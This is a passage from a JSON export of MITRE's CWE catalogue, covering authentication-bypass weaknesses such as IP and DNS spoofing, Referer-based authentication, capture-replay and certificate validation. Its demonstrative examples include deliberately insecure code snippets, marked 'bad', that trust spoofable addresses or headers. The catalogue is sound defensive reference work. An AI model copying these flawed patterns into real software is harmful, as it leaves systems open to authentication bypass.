input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0317","Description":"Protection mechanism that restricts URL access can be bypassed using URL encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0317"},{"Reference":"CVE-2004-0847","Description":"Bypass of authentication for files using \\"\\\\\\" (backslash) or \\"%5C\\" (encoded backslash).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication bypass by alternate name"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"CWE More Specific"}]},"Notes":{"Note":[{"#text":"Overlaps equivalent encodings, canonicalization, authorization, multiple trailing slash, trailing space, mixed case, and other equivalence issues.","attr":{"@_Type":"Relationship"}},{"#text":"Alternate names are useful in data driven manipulation attacks, not just for authentication.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"290":{"attr":{"@_ID":"290","@_Name":"Authentication Bypass by Spoofing","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"This attack-focused weakness is caused by improperly implemented authentication schemes that are subject to spoofing attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"This weakness can allow an attacker to access resources which are not otherwise accessible without proper authentication."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code authenticates users.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String sourceIP = request.getRemoteAddr();if (sourceIP != null && sourceIP.equals(APPROVED_IP)) {}","xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The authentication mechanism implemented relies on an IP address for source validation. If an attacker is able to spoof the IP, they may be able to bypass the authentication mechanism."},{"attr":{"@_Demonstrative_Example_ID":"DX-99"},"Intro_Text":"Both of these examples check if a request is from a trusted address before responding to the request.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv));while (1) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress clientIPAddress = rp.getAddress();int port = rp.getPort();if (isTrustedAddress(clientIPAddress) & secretKey.equals(in)) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}],"Body_Text":"The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client."},{"attr":{"@_Demonstrative_Example_ID":"DX-93"},"Intro_Text":"The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct hostent *hp;struct in_addr myaddr;char* tHost = \\"trustme.example.com\\";myaddr.s_addr=inet_addr(ip_addr_string);hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET);if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) {} else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"trusted = false;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-1048","Description":"VOIP product allows authentication bypass using 127.0.0.1 in the Host header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1048"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication bypass by spoofing"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"22"}},{"attr":{"@_CAPEC_ID":"459"}},{"attr":{"@_CAPEC_ID":"461"}},{"attr":{"@_CAPEC_ID":"473"}},{"attr":{"@_CAPEC_ID":"476"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"667"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, "Spoofing and Identification", Page 72"}}},"Notes":{"Note":{"#text":"This can be resultant from insufficient verification.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"291":{"attr":{"@_ID":"291","@_Name":"Reliance on IP Address for Authentication","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an IP address for authentication.","Extended_Description":"IP addresses can be easily spoofed. Attackers can forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"290","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Access Control","Non-Repudiation"],"Impact":["Hide Activities","Gain Privileges or Assume Identity"],"Note":"Malicious users can fake authentication information, impersonating any IP address."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use other means of identity verification that cannot be simply spoofed. Possibilities include a username/password or certificate."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-99"},"Intro_Text":"Both of these examples check if a request is from a trusted address before responding to the request.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv));while (1) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress clientIPAddress = rp.getAddress();int port = rp.getPort();if (isTrustedAddress(clientIPAddress) & secretKey.equals(in)) {}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}],"Body_Text":"The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Trusting self-reported IP address"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"4"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"Changed type from composite to weakness."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Trusting Self-reported IP Address","attr":{"@_Date":"2013-07-17"}}}},"292":{"attr":{"@_ID":"292","@_Name":"DEPRECATED: Trusting Self-reported DNS Name","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350.","Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Trusting Self-reported DNS Name","attr":{"@_Date":"2013-07-17"}},{"#text":"DEPRECATED (Duplicate): Trusting Self-reported DNS Name","attr":{"@_Date":"2021-07-20"}}]}},"293":{"attr":{"@_ID":"293","@_Name":"Using Referer Field for Authentication","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"290","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The referer field in HTML requests can be simply modified by malicious users, rendering it useless as a means of checking the validity of the request in question."},"Alternate_Terms":{"Alternate_Term":{"Term":"referrer","Description":"While the proper spelling might be regarded as \\"referrer,\\" the HTTP RFCs and their implementations use \\"referer,\\" so this is regarded as the correct spelling."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Actions, which may not be authorized otherwise, can be carried out as if they were validated by the server referred to."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"In order to usefully check if a given action is authorized, some means of strong authentication and method protection must be used. Use other means of authorization that cannot be simply spoofed. Possibilities include a username/password or certificate."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code samples check a packet\'s referer in order to decide whether or not an inbound request is from a trusted host.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"String trustedReferer = \\"http://www.example.com/\\"while(true){}","xhtml:br":"","xhtml:div":{"#text":"n = read(newsock, buffer, BUFSIZE);requestPacket = processPacket(buffer, n);if (requestPacket.referer == trustedReferer){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"openNewSecureSession(requestPacket);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"boolean processConnectionRequest(HttpServletRequest request){}","xhtml:div":{"#text":"String referer = request.getHeader(\\"referer\\")String trustedReferer = \\"http://www.example.com/\\"if(referer.equals(trustedReferer)){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"openPrivilegedConnection(request);return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"sendPrivilegeError(request);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}],"Body_Text":"These examples check if a request is from a trusted referer before responding to a request, but the code only verifies the referer name as stored in the request packet. An attacker can spoof the referer, thus impersonating a trusted client."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using referrer field for authentication"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, "Referer Request Header", Page 1030"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Background_Details, Common_Consequences, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}]}},"294":{"attr":{"@_ID":"294","@_Name":"Authentication Bypass by Capture-replay","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A capture-replay flaw exists when the design of the software makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes).","Extended_Description":"Capture-replay attacks are common and can be difficult to defeat without cryptography. They are a subset of network injection attacks that rely on observing previously-sent valid commands, then changing them slightly if necessary and resending the same commands to the server.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Messages sent with a capture-relay attack allow access to resources which are not otherwise accessible without proper authentication."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Utilize some sequence or time stamping functionality along with a checksum which takes this into account in order to ensure that messages can be parsed only once."},{"Phase":"Architecture and Design","Description":"Since any attacker who can listen to traffic can see sequence numbers, it is necessary to sign messages with some kind of cryptography to ensure that sequence numbers are not simply doctored along with content."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"},{"Reference":"CVE-2007-4961","Description":"Chain: cleartext transmission of the MD5 hash of password (CWE-319) enables attacks against a server that is susceptible to replay (CWE-294).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication bypass by replay"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Capture-replay"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"102"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"645"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"295":{"attr":{"@_ID":"295","@_Name":"Improper Certificate Validation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not validate, or incorrectly validates, a certificate.","Extended_Description":"When a certificate is invalid or malicious, it might allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. The software might connect to a malicious host while believing it is a trusted host, or the software might be deceived into accepting spoofed data that appears to originate from a trusted 